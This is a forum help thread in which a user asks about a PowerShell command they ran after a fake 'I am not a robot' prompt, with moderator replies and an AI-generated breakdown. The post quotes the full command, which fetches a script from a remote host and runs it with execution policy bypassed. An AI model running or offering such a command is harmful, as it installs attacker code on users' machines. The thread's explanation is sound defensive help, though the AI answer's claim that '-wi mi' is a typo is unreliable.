Share via

I stupidly ran this powershell prompt

JDZ 20 Reputation points
2026-02-22T18:12:47.55+00:00

I stupidly ran this CMD command and have no idea what it may have done.

powershell -wi mi -EP B -c iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt)

Can someone tell me what exactly this commandmeans? As it says towards the end, I thought I was passing a not a robot link.

Many Thanks

Windows for home | Windows 11 | Security and privacy
{count} votes

Answer accepted by question author
  1. _AW_ 66,631 Reputation points Volunteer Moderator
    2026-02-22T22:09:55.79+00:00

    You're lucky in that the final payload (Ellaism.msi) for the chain of scripts has been taken down.

    1 person found this answer helpful.

Answer recommended by moderator
  1. CrazyKats 14,805 Reputation points Volunteer Moderator
    2026-02-22T18:23:39.8233333+00:00

    Hi JDZ,

    Did running that command show

    that it did anything? If it did I would

    System Restore to before you ran the

    Command, if you created a Restore point.


1 additional answer

Sort by: Most helpful
  1. Q&A Assist
    2026-02-22T18:12:57.0866667+00:00
    AI generated content. This question contains an answer created with AI from Q&A Assist. Learn more

    The command you ran is a PowerShell command that executes a script from a remote server. Let's break it down:

    1. powershell: This invokes the PowerShell environment.
    2. -wi mi: This part is not standard and seems to be a typo or misconfiguration. It might be intended to set some parameters, but it’s unclear without context.
    3. -EP B: This sets the execution policy to Bypass, which allows scripts to run without restrictions. This is often used to run potentially harmful scripts without warning.
    4. -c: This indicates that the following string is a command to execute.
    5. iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt): This is the core of the command:
    • iex: This is an alias for Invoke-Expression, which executes the string as a command.
      • irm: This is an alias for Invoke-RestMethod, which retrieves content from the specified URL.
      • 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt: This is the URL from which the content is being fetched. The content from this URL is then executed as a PowerShell command.

    In summary, this command fetches a script from a remote server and executes it. This can be very dangerous, as it could potentially run malicious code on your system. If you are concerned about security, it is advisable to run a full antivirus scan and monitor your system for any unusual activity.


    References:

    1 person found this answer helpful.
    0 comments No comments

Your answer

Answers can be marked as 'Accepted' by the question author and 'Recommended' by moderators, which helps users know the answer solved the author's problem.